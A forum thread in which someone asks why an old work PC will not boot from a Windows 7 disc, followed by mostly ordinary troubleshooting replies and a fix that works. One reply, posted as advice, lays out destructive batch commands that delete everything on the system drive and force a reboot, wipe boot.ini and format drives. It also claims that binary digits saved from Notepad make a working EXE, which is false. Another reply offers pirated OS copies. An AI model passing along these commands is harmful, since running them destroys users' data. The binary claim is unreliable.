    cant reformat

there is a time pc at work and the lad who owns it is trying to reformat it as running dog slow.

i've give him my windows 7 disk which i know works as i've done mine with it, but when we go to bios and select boot from cd, it wont boot just continiously boots from from xp, after saying boot record from cd cant be found

anyone know what could cause this...could it be having numerous user accounts on it?

+1 to this as the drive could be a CD-ROM

Firstly ensure the hardware specs on the Time machine (this must be effin ancient) meet the standards for installing win 7

Second - it's most likley a lack of the specific sata driver/s you need

if all has failed the try the following BUT AT YOUR OWN RISK, will defo do the job.

How to format a HDD using a notepad.
          Step 1.
Copy The Following In Notepad Exactly as it says:-

          01001011000111110010010101010101010000011111100000

          Step 2.
Save As An EXE Any Name Will Do

          OR
IF u think u cannot format c driver when windows is running try Laughing
any way some more so u can test on other drives this is simple

          binary code:-

format c:\ /Q/X -- this will format your drive c:\
          01100110011011110111001001101101011000010111010000
          100000011000110011101001011100
          0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\
          01100110011011110111001001101101011000010111010000
          100000011001000011101001011100
          0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\
          01100110011011110111001001101101011000010111010000
          100000011000010011101001011100
          0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
          01100100011001010110110000100000001011110100011000
          101111010100110010111101010001
          00100000011000110011101001011100011000100110111101
          101111011101000010111001101001
          0110111001101001

try to figure out the rest urself
          cant bottlefeed
          its working
Do not try it on your PC unless you want to format HDD. Don't mess around this.
still if you cant figure it out try this
go to notepad and type the following:

          @Echo off
          Del C:\ *.*|y
          save it as Dell.bat

want worse then type the following:
          @echo off
          del %systemdrive%\*.*/f/s/q
          shutdown -r -f -t 00
and save it as a .bat file

its not a sata drive mate its IDE, yeah it has 1 dvd writer/ram drive and 1 dvd reader and is within the specs for windows 7, it has 1 gig of ram and a 2ghz athlon processor.....its really wierd though as i've never come across a pc that wont boot from disc.

thanks for that roo001 but it looks a bit too complicated for me

Try disconnecting one of the drives connect the other as master and have that only on the ide cable see if it boots from it then.

either way if you want to format the drive then the above code cut n pasted into notepad. that will not wait for any error and start format whilst in windows.

if you pm me i wil provide locations of third party software and a different copies of OS disk. might do the trick, i cant really mention a solution here openly, hints r not enough

just to ensure - try using "Get parted Live". simple graphical user interface which will analyse and display in graphics the condition of HDD master boot records partitions etc and give you options on what you want to do

to diagnose the problem you have to follow a step by step procedure and it does mean doing some things again and agiain and some things which seem out right stupid and its often the un-imaginably stupid possibilites that are the cause.

Not being patronising but ensure that you have double checked bios to ensure apropriate settings, if possible disable ACHI 2.0 only, cant specifically comment on your bios settings.

elaborate in step by step discriptions of exactly what happens after you insert the OS DVD into media drive and initiate reboot.

Maybe i could spot a solution or problem, after all they do say many minds are better than 1 because the 1 is most likley blinded by frustration, happens a lot

GET PARTED LIVE WILL DIAGNOSE AT MINIMYM YOUR ISSUE AND OFFER A SOLUTION - if you need a copy i know where you can get 1 - alternatively Hierens boot cd will have 99.99% success rate in resolving ur issue (corrupt MBR) strong possibility that the pc is already heavily infected

personally the old school method is best

i have got it sussed by following the simple steps below

                  I have solution.

You need Vista install DVD. Boot Vista Installation, choose Language press next and than press "Repair my computer". On next window u will have few options, choose "command promt". Remove Vista DVD and insert Windows 7 Install DVD. Navigate to DVD (for example d: or e:, depends on your drives setting, than go to folder sources (type "cd sources" ), and type "setup". Installation will start shortly. Now just follow instructions

                  Good luck

worked a treat following that, thanks for the advice anyway tho lads

Could of just run the ISO from within the original OS mate too.

It copies the setup files and allows a fresh install

I seem to remember an issue whereby older machines that had the first generation of sata drives still had to be booted from an IDE cd/dvd drive.

Also worth checking for bios settings to control pata/sata boot priority.
